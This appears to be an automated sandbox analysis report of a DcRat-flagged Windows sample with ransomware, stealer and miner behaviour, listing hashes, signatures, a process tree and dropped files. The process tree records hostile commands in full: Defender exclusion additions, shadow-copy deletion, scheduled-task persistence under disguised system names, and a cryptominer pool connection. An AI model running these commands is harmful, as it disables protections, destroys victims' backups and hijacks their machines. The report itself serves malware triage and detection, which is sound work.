Overview

overview

10

Static

static

7

ec50388a69...a6.exe

windows7-x64

10

ec50388a69...a6.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    136s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-03-2023 09:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ec50388a69792d133c1298e1dceb40a6.exe

  • Size

    2.3MB

  • MD5

    ec50388a69792d133c1298e1dceb40a6

  • SHA1

    80ff3e79bc0679a0e2e91e811310e9fe59c5fcdb

  • SHA256

    bdc2f986320facc24627b6e31ae3ff0147583b04c262a386b2043557b59d06c0

  • SHA512

    fc1141659419b03040ce5bfb3b98c53f2ed53c49e285a68e341620c569f1aa6beb0cb17559e331af6f25a805ae70070a90787e26c4ee5474985c1cb52d04ab59

  • SSDEEP

    49152:PuxU6VfbIhv2/g8nn7HoqW2m86bzBvwv+P9gB8xy2LmQKV:Wi6VzIA/gg7IR8iVgB8xybQKV

Score
10/10
dcratevasioninfostealerransomwareratspywarestealerthemidatrojan

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Process spawned unexpected child process 24 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 9 IoCs
    evasiontrojan
  • DCRat payload 5 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

    rat
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
    evasion
  • Downloads MZ/PE file
  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 10 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks whether UAC is enabled 1 TTPs 6 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 12 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 25 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 60 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 9 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe
    "C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe"
    1⤵
    • UAC bypass
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:1636
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:692
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Music\backgroundTaskHost.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1912
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\backgroundTaskHost.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2380
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\spoolsv.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3104
    • C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe
      "C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe"
      2⤵
      • UAC bypass
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • System policy modification
      PID:4452
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4256
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe'
        3⤵
          PID:4956
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\System.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3336
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\winlogon.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2180
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\dllhost.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4080
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\images\wininit.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4868
        • C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe
          "C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe"
          3⤵
          • UAC bypass
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Checks whether UAC is enabled
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:3116
          • C:\Users\Admin\AppData\Local\Temp\m.exe
            "C:\Users\Admin\AppData\Local\Temp\m.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1304
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4684
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ZEGCIBQVA" /tr "C:\ProgramData\battlenet\ZEGCIBQVA.exe"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:6136
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ZEGCIBQVA" /tr "C:\ProgramData\battlenet\ZEGCIBQVA.exe"
                6⤵
                • Creates scheduled task(s)
                PID:4040
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RFLLB2JSF2jF32LXcusk7Mo9bvC7o8WbPt.work -p x -t 10
              5⤵
                PID:3752
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c cls
                  6⤵
                    PID:1676
              • C:\Users\Admin\AppData\Local\Temp\h.exe
                "C:\Users\Admin\AppData\Local\Temp\h.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:3932
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
                  5⤵
                  • Modifies extensions of user files
                  • Enumerates connected drives
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:4056
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
                    6⤵
                      PID:4956
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe delete shadows /all /quiet
                        7⤵
                        • Interacts with shadow copies
                        PID:5348
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:5740
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe delete shadows /all /quiet
                        7⤵
                        • Interacts with shadow copies
                        PID:5800
                • C:\Users\Admin\AppData\Local\Temp\mm.exe
                  "C:\Users\Admin\AppData\Local\Temp\mm.exe"
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:5260
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5380
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:220
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:1752
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:5032
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Music\backgroundTaskHost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:3240
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\Public\Music\backgroundTaskHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:4116
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Music\backgroundTaskHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:4084
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:2748
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:4672
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:4892
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:3888
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:4612
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:4760
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\System.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:540
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Windows Security\System.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:4224
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\System.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:1300
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\winlogon.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:2440
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Default User\winlogon.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:4932
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\winlogon.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:4948
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Windows\CbsTemp\dllhost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:5108
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\CbsTemp\dllhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:4984
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Windows\CbsTemp\dllhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:1680
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Internet Explorer\images\wininit.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:1584
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\images\wininit.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:2084
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Internet Explorer\images\wininit.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:3696
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4632
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:5508

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe
            Filesize

            2.3MB

            MD5

            ec50388a69792d133c1298e1dceb40a6

            SHA1

            80ff3e79bc0679a0e2e91e811310e9fe59c5fcdb

            SHA256

            bdc2f986320facc24627b6e31ae3ff0147583b04c262a386b2043557b59d06c0

            SHA512

            fc1141659419b03040ce5bfb3b98c53f2ed53c49e285a68e341620c569f1aa6beb0cb17559e331af6f25a805ae70070a90787e26c4ee5474985c1cb52d04ab59

            Download Submit
          • C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe
            Filesize

            2.3MB

            MD5

            ec50388a69792d133c1298e1dceb40a6

            SHA1

            80ff3e79bc0679a0e2e91e811310e9fe59c5fcdb

            SHA256

            bdc2f986320facc24627b6e31ae3ff0147583b04c262a386b2043557b59d06c0

            SHA512

            fc1141659419b03040ce5bfb3b98c53f2ed53c49e285a68e341620c569f1aa6beb0cb17559e331af6f25a805ae70070a90787e26c4ee5474985c1cb52d04ab59

            Download Submit
          • C:\Recovery\WindowsRE\RCX9F97.tmp
            Filesize

            2.3MB

            MD5

            8058f8123153d8ec14b8e46d48dea44e

            SHA1

            17f18234fdd7defc8cbbd01533a2f1a094fb4f5d

            SHA256

            e1f31b94a4e6d8293b7fb5c7a31e05462150b079dbe42079ca5d22bb9b6fab59

            SHA512

            e456e9603dbe717f6b743bb0c4634ded1bdcf87df7b16a0287bafb2d18d95aed73353d561cd7b04a045a70975a76ba62df0a0f6ee755adb033f0de7978c52e64

            Download Submit
          • C:\Recovery\WindowsRE\backgroundTaskHost.exe
            Filesize

            2.3MB

            MD5

            ec50388a69792d133c1298e1dceb40a6

            SHA1

            80ff3e79bc0679a0e2e91e811310e9fe59c5fcdb

            SHA256

            bdc2f986320facc24627b6e31ae3ff0147583b04c262a386b2043557b59d06c0

            SHA512

            fc1141659419b03040ce5bfb3b98c53f2ed53c49e285a68e341620c569f1aa6beb0cb17559e331af6f25a805ae70070a90787e26c4ee5474985c1cb52d04ab59

            Download Submit
          • C:\Recovery\WindowsRE\eddb19405b7ce1
            Filesize

            1KB

            MD5

            ffcedf515e531d74f5799d21741f5d07

            SHA1

            cdd349adfa3a4644d86a4a1052a6d7c9e918f55c

            SHA256

            c05e7534f76a611dfbf29dd8fff40a65264812bda8630b1290090846baa90651

            SHA512

            a02dbf221e073db6ff14ed8f88293939500495a55d49b9bbd041e1dbef6d6aa2c12510f922e1ee0faa0b5f96816cd52d56f0840a19aa71b5b87098c96a1fe10d

            Download Submit
          • C:\Recovery\WindowsRE\f3b6ecef712a24
            Filesize

            748B

            MD5

            18e3300114651ae5830d46a77b59f095

            SHA1

            a9b55afd5d24a503f7c385a6ea55a15704862e36

            SHA256

            2cfa5da54fbf5837fbb25bc002b338a302f13b70d6fb9f73ac48444d42ce3da9

            SHA512

            9775f4838027604de1b32381d16552a5e9b3cbef054e15529af2833a238e84ccac7cbcfa940a399cfb0b7fe8a0d70f89049645d640c8df90446b2b8eddf929d1

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ec50388a69792d133c1298e1dceb40a6.exe.log
            Filesize

            1KB

            MD5

            e1b159e530af554c42b6b6f3aefbd4de

            SHA1

            281d3767129c8aa8fc8867515578dee1eb7f39ba

            SHA256

            94b7640dce6d228f0d89f1d504c7143397ffa2af6adf910b501d9d51583f463e

            SHA512

            f373930c1dfab5e3029af93880c2f3bfc16413aaa28a563d4b953f93066facfe1ee1213e5facb6b92df79b2b3d2a2866df7c15fa2d6fe0a359186688aa7e99f0

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            3d086a433708053f9bf9523e1d87a4e8

            SHA1

            b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

            SHA256

            6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

            SHA512

            931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            18KB

            MD5

            5a39d91e076fe4593c08a47f56e52460

            SHA1

            ef1617b70640079e9988e81477b6b9e01711b4dc

            SHA256

            1440fbb80eba269dea076aa965211bfefe5186a66696443386d7981a4d7bf183

            SHA512

            af48ad99dcfda6f503ef610677a7bd0a3c1f5741102c436f06ebd30269e2f916e18bd44653b120adc81fe3673da108d56c6340ca29fb5f1feafc9e8b89efc211

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            18KB

            MD5

            5a39d91e076fe4593c08a47f56e52460

            SHA1

            ef1617b70640079e9988e81477b6b9e01711b4dc

            SHA256

            1440fbb80eba269dea076aa965211bfefe5186a66696443386d7981a4d7bf183

            SHA512

            af48ad99dcfda6f503ef610677a7bd0a3c1f5741102c436f06ebd30269e2f916e18bd44653b120adc81fe3673da108d56c6340ca29fb5f1feafc9e8b89efc211

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            18KB

            MD5

            5a39d91e076fe4593c08a47f56e52460

            SHA1

            ef1617b70640079e9988e81477b6b9e01711b4dc

            SHA256

            1440fbb80eba269dea076aa965211bfefe5186a66696443386d7981a4d7bf183

            SHA512

            af48ad99dcfda6f503ef610677a7bd0a3c1f5741102c436f06ebd30269e2f916e18bd44653b120adc81fe3673da108d56c6340ca29fb5f1feafc9e8b89efc211

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            18KB

            MD5

            5a39d91e076fe4593c08a47f56e52460

            SHA1

            ef1617b70640079e9988e81477b6b9e01711b4dc

            SHA256

            1440fbb80eba269dea076aa965211bfefe5186a66696443386d7981a4d7bf183

            SHA512

            af48ad99dcfda6f503ef610677a7bd0a3c1f5741102c436f06ebd30269e2f916e18bd44653b120adc81fe3673da108d56c6340ca29fb5f1feafc9e8b89efc211

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            18KB

            MD5

            41e904e39f05513fbea3f2cc85f6bb80

            SHA1

            43a088c467f6a72a3a342f9f4d5d5a6df31e03d5

            SHA256

            277bd2da142f7d10c5c44d4c788f9ecdc9ca12481e4d0984ba7fb3895faf4a80

            SHA512

            ae866df670c7c5b6a2ce8e71aaf926b2a0e29450902285839f6161b7440b920401608d6087c6974ff7394dd135df65c4d5b908c0798a6caf954277b368c30287

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            18KB

            MD5

            2802c3222bfdefd47336d3cdc87791d9

            SHA1

            e87893c5e06b9abec3f77f20b7d3f2dc8eac2ccc

            SHA256

            7706f631c7b9f827a3dc15e578fc5c0030df9248a93efa4b428853b3081c5c7d

            SHA512

            51ce77cc1449fab6e857014fc5fec8331c18bc54f1f6c9eb1a6a88bbd259250d93204da05a750b15c27700ce88d134a85f5a01318e87111cde0aa09aea69c742

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            18KB

            MD5

            fdd2b2888041dfa29fc0f255221f9144

            SHA1

            f62a63011217f85374ebc36cd53536b18fc5093a

            SHA256

            7ecaa84b2e455a4ac23d28068298a833bf1195e6333c39241109f9caa3aebf32

            SHA512

            3d6cd87edf42f26e281db89ab74681ec2c4d415f00d466f1e3f7249658c6d3767700871ab2db746ba146e1b274587428203294081adc3a60fa94b1b81ec0c1d3

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            18KB

            MD5

            fdd2b2888041dfa29fc0f255221f9144

            SHA1

            f62a63011217f85374ebc36cd53536b18fc5093a

            SHA256

            7ecaa84b2e455a4ac23d28068298a833bf1195e6333c39241109f9caa3aebf32

            SHA512

            3d6cd87edf42f26e281db89ab74681ec2c4d415f00d466f1e3f7249658c6d3767700871ab2db746ba146e1b274587428203294081adc3a60fa94b1b81ec0c1d3

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            18KB

            MD5

            fdd2b2888041dfa29fc0f255221f9144

            SHA1

            f62a63011217f85374ebc36cd53536b18fc5093a

            SHA256

            7ecaa84b2e455a4ac23d28068298a833bf1195e6333c39241109f9caa3aebf32

            SHA512

            3d6cd87edf42f26e281db89ab74681ec2c4d415f00d466f1e3f7249658c6d3767700871ab2db746ba146e1b274587428203294081adc3a60fa94b1b81ec0c1d3

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            9b80cd7a712469a4c45fec564313d9eb

            SHA1

            6125c01bc10d204ca36ad1110afe714678655f2d

            SHA256

            5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

            SHA512

            ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

            Download Submit
          • C:\Users\Admin\AppData\Local\Temp\ElJlpTTjQF
            Filesize

            46KB

            MD5

            02d2c46697e3714e49f46b680b9a6b83

            SHA1

            84f98b56d49f01e9b6b76a4e21accf64fd319140

            SHA256

            522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

            SHA512

            60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

            Download Submit
          • C:\Users\Admin\AppData\Local\Temp\Km2JpwhXKY
            Filesize

            112KB

            MD5

            780853cddeaee8de70f28a4b255a600b

            SHA1

            ad7a5da33f7ad12946153c497e990720b09005ed

            SHA256

            1055ff62de3dea7645c732583242adf4164bdcfb9dd37d9b35bbb9510d59b0a3

            SHA512

            e422863112084bb8d11c682482e780cd63c2f20c8e3a93ed3b9efd1b04d53eb5d3c8081851ca89b74d66f3d9ab48eb5f6c74550484f46e7c6e460a8250c9b1d8

            Download Submit
